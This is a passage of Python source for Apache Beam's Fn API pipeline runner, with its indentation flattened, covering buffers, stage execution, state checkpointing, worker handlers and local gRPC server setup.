self._state = self.UNSTARTED_STATE
    # The following self._req_* variables are used for debugging purposes; data is
    # added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(ControlConnection)
def get_conn_by_worker_id(self, worker_id):
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self, iterator, context):
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
      raise RuntimeError('All workers communicating through gRPC should have '
                         'a worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
logging.debug('Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
logging.debug('Runner: Requests multiplexing info: %s',
[(str(req), worker) for req, worker
in self._req_worker_mapping.items()])
class _ListBuffer(list):
"""Used to support parititioning of a list."""
def partition(self, n):
return [self[k::n] for k in range(n)]
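# Worked example (informal): partition() stripes elements round-robin across n
# sub-lists, e.g. _ListBuffer([b'a', b'b', b'c', b'd', b'e']).partition(2)
# returns [[b'a', b'c', b'e'], [b'b', b'd']].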
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def partition(self, n):
""" It is used to partition _GroupingBuffer to N parts. Once it is
partitioned, it would not be re-partitioned with diff N. Re-partition
is not supported now.
"""
if not self._grouped_output:
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(None).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
# TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock
# note that this only comes through if windowing is default - but what
# about having multiple firings on the global window.
# May need to revise.
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
self._grouped_output = [[] for _ in range(n)]
output_stream_list = []
for _ in range(n):
output_stream_list.append(create_OutputStream())
for idx, (encoded_key, windowed_values) in enumerate(self._table.items()):
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True)
for ix, output_stream in enumerate(output_stream_list):
self._grouped_output[ix] = [output_stream.get()]
self._table = None
return self._grouped_output
def __iter__(self):
""" Since partition() returns a list of lists, add this __iter__ to return
a list to simplify code when we need to iterate through ALL elements of
_GroupingBuffer.
"""
return itertools.chain(*self.partition(1))
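# Note (informal): partition(n) assigns each grouped key to output shard idx % n in
# table-iteration order, so keys are spread round-robin across the n sub-lists and
# all values for a given key end up in the same shard.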
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, access_pattern, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extrator = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extrator = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
key, value = self._kv_extrator(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
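# Note (informal): for ITERABLE side inputs every value is stored under the constant
# key '' (via SingletonCoder), while for MULTIMAP side inputs the (key, value) pair is
# taken from the element itself; in both cases values are bucketed per window so that
# encoded_items() can emit (encoded key, encoded window, encoded values) triples.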
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None,
bundle_repeat=0,
use_state_iterables=False,
provision_info=None):
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment
or beam_runner_api_pb2.Environment(urn=python_urns.EMBEDDED_PYTHON))
self._bundle_repeat = bundle_repeat
self._num_workers = 1
self._progress_frequency = None
self._profiler_factory = None
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline, options):
MetricsEnvironment.set_metrics_supported(False)
RuntimeValueProvider.set_runtime_options({})
# Setup "beam_fn_api" experiment options if lacked.
experiments = (options.view_as(pipeline_options.DebugOptions).experiments
or [])
if not 'beam_fn_api' in experiments:
experiments.append('beam_fn_api')
options.view_as(pipeline_options.DebugOptions).experiments = experiments
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
# TODO: Move group_by_key_input_visitor() to a non-dataflow specific file.
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._num_workers = options.view_as(
pipeline_options.DirectOptions).direct_num_workers or self._num_workers
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
if 'use_sdf_bounded_source' in experiments:
pipeline.replace_all(DataflowRunner._SDF_PTRANSFORM_OVERRIDES)
self._latest_run_result = self.run_via_runner_api(pipeline.to_runner_api(
default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
stage_context, stages = self.create_stages(pipeline_proto)
# TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to
# the teststream (if any), and all the stages).
return self.run_stages(stage_context, stages)
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
logging.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-variable
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn]),
use_state_iterables=self._use_state_iterables)
def run_stages(self, stage_context, stages):
"""Run a list of topologically-sorted stages in batch mode.
Args:
stage_context (fn_api_runner_transforms.TransformContext)
stages (list[fn_api_runner_transforms.Stage])
"""
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(_ListBuffer)
for stage in stages:
stage_results = self._run_stage(
worker_handler_manager.get_worker_handlers,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def _store_side_inputs_in_state(self,
worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders):
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
ptransform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
worker_handler.state.blocking_append(state_key, elements_data)
def _run_bundle_multiple_times_for_testing(
self, worker_handler_list, process_bundle_descriptor, data_input,
data_output, get_input_coder_callable):
# all workers share state, so use any worker_handler.
worker_handler = worker_handler_list[0]
for k in range(self._bundle_repeat):
try:
worker_handler.state.checkpoint()
ParallelBundleManager(
worker_handler_list, lambda pcoll_id: [],
get_input_coder_callable, process_bundle_descriptor,
self._progress_frequency, k, num_workers=self._num_workers
).process_bundle(data_input, data_output)
finally:
worker_handler.state.restore()
def _collect_written_timers_and_add_to_deferred_inputs(self,
context,
pipeline_components,
stage,
get_buffer_callable,
deferred_inputs):
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer_callable(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id] = _ListBuffer([out.get()])
written_timers[:] = []
def _add_residuals_and_channel_splits_to_deferred_inputs(
self, splits, get_input_coder_callable,
input_for_callable, last_sent, deferred_inputs):
prev_stops = {}
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[
input_for_callable(
delayed_application.application.ptransform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_callable(channel_split.ptransform_id)
        # TODO(SDF): This requires deterministic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(coder_impl.decode_all(b''.join(last_sent[
channel_split.ptransform_id])))
residual_elements = all_elements[
channel_split.first_residual_element : prev_stops.get(
channel_split.ptransform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[channel_split.ptransform_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.ptransform_id] = channel_split.last_primary_element
@staticmethod
def _extract_stage_data_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = _ListBuffer([ENCODED_IMPULSE_VALUE])
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
def _run_stage(self,
worker_handler_factory,
pipeline_components,
stage,
pcoll_buffers,
safe_coders):
"""Run an individual stage.
Args:
worker_handler_factory: A ``callable`` that takes in an environment, and
returns a ``WorkerHandler`` class.
pipeline_components (beam_runner_api_pb2.Components): TODO
stage (fn_api_runner_transforms.Stage)
pcoll_buffers (collections.defaultdict of str: list): Mapping of
PCollection IDs to list that functions as buffer for the
``beam.PCollection``.
safe_coders (dict): TODO
"""
def iterable_state_write(values, element_coder_impl):
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
worker_handler.state.blocking_append(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
worker_handler_list = worker_handler_factory(
stage.environment, self._num_workers)
    # All worker_handlers share the same grpc server, so we can read grpc server
    # info from any of them; here we simply use the first worker_handler.
worker_handler = next(iter(worker_handler_list))
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = worker_handler.data_api_service_descriptor()
logging.info('Running %s', stage.name)
data_input, data_side_input, data_output = self._extract_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if worker_handler.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
worker_handler.state_api_service_descriptor().url)
# Store the required side inputs into state so it is accessible for the
# worker when it runs this bundle.
self._store_side_inputs_in_state(worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders)
def get_buffer(buffer_id):
"""Returns the buffer for a given (operation_type, PCollection ID).
For grouping-typed operations, we produce a ``_GroupingBuffer``. For
others, we produce a ``_ListBuffer``.
"""
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
# If `buffer_id` is not a key in `pcoll_buffers`, it will be added by
# the `defaultdict`.
return pcoll_buffers[buffer_id]
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[safe_coders[
beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload
).coder_id
]].get_impl()
self._run_bundle_multiple_times_for_testing(worker_handler_list,
process_bundle_descriptor,
data_input,
data_output,
get_input_coder_impl)
bundle_manager = ParallelBundleManager(
worker_handler_list, get_buffer, get_input_coder_impl,
process_bundle_descriptor, self._progress_frequency,
num_workers=self._num_workers)
result, splits = bundle_manager.process_bundle(data_input, data_output)
def input_for(ptransform_id, input_id):
input_pcoll = process_bundle_descriptor.transforms[
ptransform_id].inputs[input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN
and input_pcoll in proto.outputs.values()):
return read_id
raise RuntimeError(
'No IO transform feeds %s' % ptransform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(_ListBuffer)
self._collect_written_timers_and_add_to_deferred_inputs(
context, pipeline_components, stage, get_buffer, deferred_inputs)
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.ptransform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
self._add_residuals_and_channel_splits_to_deferred_inputs(
splits, get_input_coder_impl, input_for, last_sent, deferred_inputs)
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = _ListBuffer([])
# TODO(robertwb): merge results
        # We cannot split deferred_inputs until residual_roots are included in the
        # merged results; without residual_roots, the pipeline stops earlier and we
        # may miss some data.
bundle_manager._num_workers = 1
bundle_manager._skip_registration = True
last_result, splits = bundle_manager.process_bundle(
deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
@staticmethod
def _extract_endpoints(stage,
pipeline_components,
data_api_service_descriptor,
pcoll_buffers):
"""Returns maps of transform names to PCollection identifiers.
Also mutates IO stages to point to the data ApiServiceDescriptor.
Args:
stage (fn_api_runner_transforms.Stage): The stage to extract endpoints
for.
pipeline_components (beam_runner_api_pb2.Components): Components of the
pipeline to include coders, transforms, PCollections, etc.
data_api_service_descriptor: A GRPC endpoint descriptor for data plane.
pcoll_buffers (dict): A dictionary containing buffers for PCollection
elements.
Returns:
A tuple of (data_input, data_side_input, data_output) dictionaries.
`data_input` is a dictionary mapping (transform_name, output_name) to a
PCollection buffer; `data_output` is a dictionary mapping
(transform_name, output_name) to a PCollection ID.
"""
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[transform.unique_name] = _ListBuffer(
[ENCODED_IMPULSE_VALUE])
else:
data_input[transform.unique_name] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
data_output[transform.unique_name] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
self._use_continuation_tokens = False
self._continuations = {}
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
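    # Informal note on the checkpoint protocol above: checkpoint() swaps the live
    # state for a CopyOnWriteState overlay, commit() folds the overlay back into the
    # original dict, and restore() discards the overlay and returns to the
    # checkpointed state. This lets _run_bundle_multiple_times_for_testing replay a
    # bundle without persisting its state mutations.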
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def blocking_get(self, state_key, continuation_token=None):
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = 'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', '%s:0' % token_base
else:
token_base, index = continuation_token.split(':')
ix = int(index)
full_state = self._continuations[token_base]
if ix == len(full_state):
return b'', None
else:
return full_state[ix], '%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def blocking_append(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
def blocking_clear(self, state_key):
with self._lock:
del self._state[self._to_key(state_key)]
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
self._state = state
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_reference.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.blocking_get(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.blocking_append(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.blocking_clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {}
_worker_id_counter = -1
_lock = threading.Lock()
def __init__(
self, control_handler, data_plane_handler, state, provision_info):
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
self.stop_worker()
def start_worker(self):
raise NotImplementedError
def stop_worker(self):
raise NotImplementedError
def data_api_service_descriptor(self):
raise NotImplementedError
def state_api_service_descriptor(self):
raise NotImplementedError
def logging_api_service_descriptor(self):
raise NotImplementedError
@classmethod
def register_environment(cls, urn, payload_type):
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls, environment, state, provision_info, grpc_server):
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self, unused_payload, state, provision_info,
unused_grpc_server=None):
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self
self.data_conn = self.data_plane_handler
self.worker = sdk_worker.SdkWorker(
sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(self.state),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
{}))
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
pass
def stop_worker(self):
self.worker.stop()
def done(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
def logging_api_service_descriptor(self):
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(
beam_provision_api_pb2_grpc.ProvisionServiceServicer):
def __init__(self, info):
self._info = info
def GetProvisionInfo(self, request, context=None):
return beam_provision_api_pb2.GetProvisionInfoResponse(
info=self._info)
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, state, provision_info):
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10))
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
